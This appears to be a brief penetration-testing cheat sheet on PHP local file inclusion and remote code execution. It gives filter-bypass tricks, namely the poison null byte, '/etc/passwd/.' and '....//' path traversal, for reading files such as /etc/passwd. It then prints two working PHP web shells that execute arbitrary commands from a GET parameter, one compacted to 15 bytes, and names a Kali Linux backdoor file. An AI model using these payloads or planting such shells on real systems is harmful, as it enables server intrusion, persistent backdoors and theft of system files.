For PHP < 5.3.4, you can use the poison null byte to defeat simple path filters or situations where the developer is appending some suffix to user input to try to prevent local file inclusion attacks.

If the poison null byte doesn’t work, another trick relies on the fact that for some bizarre reason PHP allows files to be referenced with . notation just like directories. In other words, /etc/passwd/. will return the contents of /etc/passwd!

Representing ../ as ....// can bypass filters that replace ../, as PHP search-and-replace only does a single pass through a string (it should be obvious how to extend this if a developer tries to just run a search and replace twice).

RCE

PHP web shell

<?php
	echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";
?>

A slightly spruced-up version of this is available on Kali Linux as /usr/share/webshells/php/simple-backdoor.php.

On space-constrained systems, you can compact this down to just 15 bytes:

<?=`$_GET[1]`?>
Link to original